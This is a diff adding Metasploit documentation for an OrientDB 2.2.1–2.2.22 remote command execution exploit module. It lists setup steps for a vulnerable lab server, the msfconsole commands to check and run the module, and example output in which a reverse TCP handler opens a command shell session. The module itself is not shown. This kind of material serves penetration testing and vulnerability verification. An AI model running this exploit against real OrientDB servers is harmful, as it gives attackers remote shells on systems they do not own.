Orientdb 2.2.x RCE - Add documentation

Author: Ricardo Almeida

documentation/modules/exploit/multi/http/orientdb_exec.md

@@ -0,0 +1,44 @@
+This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.
+
+All versions from 2.2.1 up to 2.2.22 should be vulnerable.
+
+The module is based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3318
+
+## Vulnerable Application
+OrientDB 2.2.1 <= 2.2.22
+
+## Installation
+Download a vulnerable OrientDB version here: http://orientdb.com/download-previous/
+`$ wget http://orientdb.com/download.php?file=orientdb-community-2.2.20.zip&os=multi`
+`$ unzip orientdb-community-2.2.20.zip`
+`$ chmod 755 bin/*.sh`
+`$ chmod -R 777 config`
+`$ cd bin`
+`$ ./server.sh`
+
+## References for running OrientDB 
+http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Installation.html
+http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Run-the-server.html
+
+## References for vulnerability
+https://blogs.securiteam.com/index.php/archives/3318
+http://www.palada.net/index.php/2017/07/13/news-2112/
+https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/orientdb_exec`
+- [ ]  `set rhost <RHOST>`
+- [ ]  `set target <TARGET_NUMBER>`
+- [ ]  `set workspace <WORKSPACE>`
+- [ ]  `check`
+- [ ] **Verify** if the OrientDB instance is vulnerable
+- [ ]  `run`
+- [ ] **Verify** you get a session
+
+## Example Output
+`[LHOST:127.0.0.1][Workspace:default][Jobs:0][Sessions:0][/Users/vibrio] exploit(orientdb_exec) > run`
+`[*] [2017.07.18-15:55:47] Started reverse TCP handler on 127.0.0.1:37331`
+`[*] [2017.07.18-15:55:49] 127.0.0.1:2480 - Sending payload...`
+`[*] Command shell session 1 opened (127.0.0.1:37331 -> 127.0.0.1:46594) at 2017-07-18 15:55:49 +0100`
+